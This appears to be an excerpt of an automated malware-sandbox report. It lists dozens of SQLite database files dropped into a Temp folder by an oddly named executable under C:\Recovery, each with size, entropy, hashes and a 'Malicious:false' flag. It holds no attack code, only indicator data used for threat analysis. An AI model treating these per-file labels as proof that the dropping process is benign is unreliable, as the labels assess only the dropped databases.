                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\h1WaPwBxfu

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\h77Uk2epKz

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\hKCUSLWaOB

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\hfO5r528hj

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\i1GPk8RW0t

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\i3aS1P0SQ0

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\iBP5BfRoTv

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\iCPfZ7GX4L

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\iUEGziQQOE

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\jVJxA6p1rU

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\jsd2X99sYI

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\jx3Kwac9ON

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\kGzEMTfLq6

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\kLNw7mGvh6

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\kMH3985fXD

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\kdgODjPdIK

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\kiOispgUCC

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\klC6K8HF4L

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\l0vATOG0Ux

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\ld6hTecCzW

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\m4n2ToK0px

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\m8zKUUL1JB

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\mCix0QvO32

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
